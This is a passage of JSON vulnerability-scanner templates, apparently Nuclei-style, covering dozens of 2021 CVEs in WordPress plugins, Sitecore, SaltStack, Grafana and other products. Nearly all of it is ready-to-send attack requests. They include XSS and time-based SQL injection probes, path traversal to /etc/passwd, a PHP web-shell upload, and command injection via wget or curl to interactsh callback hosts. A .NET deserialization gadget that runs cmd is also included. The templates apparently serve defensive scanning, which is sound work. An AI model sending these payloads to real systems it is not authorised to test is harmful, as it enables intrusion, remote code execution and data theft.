Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25067","info":{"name":"Landing Page Builder < 1.4.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")","contains(body_2, \"Enter Page Title\")"],"condition":"and"}]}]},{"id":"CVE-2021-36356","info":{"name":"Kramer VIAware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nradioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n","GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-39350","info":{"name":"FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","<h1>FV Player Stats</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" ?>\n<a>\n    <query></query>\n    <source>foo</source>\n    <parameters>\n        <parameter name=\"\">\n            <ArrayOfstring z:Id=\"1\" z:Type=\"System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\n                xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"\n                xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"\n                xmlns:x=\"http://www.w3.org/2001/XMLSchema\"\n                xmlns:z=\"http://schemas.microsoft.com/2003/10/Serialization/\">\n                <Count z:Id=\"2\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Count>\n                <Comparer z:Id=\"3\" z:Type=\"System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"0\"\n                    xmlns=\"\">\n                    <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n                        xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n                        xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n                        <Delegate z:Id=\"5\" z:Type=\"System.DelegateSerializationHolder+DelegateEntry\" z:Assembly=\"0\"\n                            xmlns=\"\">\n                            <a:assembly z:Id=\"6\">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>\n                            <a:delegateEntry z:Id=\"7\">\n                                <a:assembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:delegateEntry i:nil=\"true\"/>\n                                <a:methodName z:Id=\"8\">Compare</a:methodName>\n                                <a:target i:nil=\"true\"/>\n                                <a:targetTypeAssembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:targetTypeName z:Id=\"9\">System.String</a:targetTypeName>\n                                <a:type z:Id=\"10\">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                            </a:delegateEntry>\n                            <a:methodName z:Id=\"11\">Start</a:methodName>\n                            <a:target i:nil=\"true\"/>\n                            <a:targetTypeAssembly z:Id=\"12\">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>\n                            <a:targetTypeName z:Id=\"13\">System.Diagnostics.Process</a:targetTypeName>\n                            <a:type z:Id=\"14\">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                        </Delegate>\n                        <method0 z:Id=\"15\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"11\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"12\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"13\" i:nil=\"true\"/>\n                            <Signature z:Id=\"16\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"17\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"18\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method0>\n                        <method1 z:Id=\"19\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"8\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"6\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"9\" i:nil=\"true\"/>\n                            <Signature z:Id=\"20\" z:Type=\"System.String\" z:Assembly=\"0\">Int32 Compare(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"21\" z:Type=\"System.String\" z:Assembly=\"0\">System.Int32 Compare(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"22\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method1>\n                    </_comparison>\n                </Comparer>\n                <Version z:Id=\"23\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Version>\n                <Items z:Id=\"24\" z:Type=\"System.String[]\" z:Assembly=\"0\" z:Size=\"2\"\n                    xmlns=\"\">\n                    <string z:Id=\"25\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">/c nslookup {{interactsh-url}}</string>\n                    <string z:Id=\"26\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">cmd</string>\n                </Items>\n            </ArrayOfstring>\n        </parameter>\n    </parameters>\n</a>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-40971","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33807","info":{"name":"Cartadis Gespage 8.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["NetpDoDomainJoin:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24409","info":{"name":"Prismatic < 2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"Leave A Review?\")","contains(body_2, \"onanimationend=alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2021-46417","info":{"name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-37304","info":{"name":"Jeecg Boot <= 2.4.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/actuator/httptrace/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"traces\":[","\"headers\"","\"request\":{"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44515","info":{"name":"Zoho ManageEngine Desktop Central - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /STATE_ID/123/agentLogUploader HTTP/1.1\nHost: {{Hostname}}\nCookie: STATE_COOKIE=&_REQS/_TIME/123\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 0"]},{"type":"word","part":"header","words":["UEMJSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27309","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>.php"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45092","info":{"name":"Thinfinity Iframe Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lab.html?vpath=//interact.sh"],"matchers":[{"type":"regex","regex":[".*vpath.*","thinfinity"],"condition":"and"}]}]},{"id":"CVE-2021-39226","info":{"name":"Grafana Snapshot - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/snapshots/:key"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"isSnapshot\":true"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n<?php echo 'CVE-2021-24145'; ?>\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'CVE-2021-24145')"],"condition":"and"}]}]},{"id":"CVE-2021-24762","info":{"name":"WordPress Perfect Survey<1.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=4"]},{"type":"word","part":"header","words":["wp-ps-session"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-31589","info":{"name":"BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","bomgar"],"case-insensitive":true,"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24946","info":{"name":"WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"The event is finished\") || contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-40969","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[firstname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41467","info":{"name":"JustWriting  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42063","info":{"name":"SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>","SAPIKS2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24997","info":{"name":"WordPress Guppy <=1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"guppyUsers\":","\"userId\":","\"type\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25008","info":{"name":"The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","Snippets"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3110","info":{"name":"PrestaShop 1.7.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-24364","info":{"name":"WordPress Jannah Theme <5.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32819","info":{"name":"Nodejs Squirrelly - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Wget"]}]}]},{"id":"CVE-2021-40973","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[lastname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46422","info":{"name":"SDT-CW3B1 1.1.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>"]},{"type":"word","name":"http","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2021-25281","info":{"name":"SaltStack Salt <3002.5 - Auth Bypass","severity":"critical"},"requests":[{"raw":["POST /run HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["return","tag","jid","salt","wheel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26598","info":{"name":"ImpressCMS <1.4.3 - Incorrect Authorization","severity":"medium"},"requests":[{"raw":["GET /misc.php?action=showpopups&type=friend HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n","GET /include/findusers.php?token={{token}} HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["last_login","user_regdate","uname"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["REQUEST' value='(.*?)'","REQUEST\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>400 - Bad Request</title>","&lt;title&gt;400 - Bad Request&lt;/title&gt;"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24510","info":{"name":"WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"></script><script>alert(document.domain)</script><\" HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24214","info":{"name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ERROR (<script>alert(document.domain)</script>):","Login with OpenID Connect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38647","info":{"name":"Microsoft Open Management Infrastructure - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wsman HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml;charset=UTF-8\n\n<s:Envelope\n  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n  xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n  <s:Header>\n    <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n    <a:ReplyTo>\n      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n    </a:ReplyTo>\n    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n    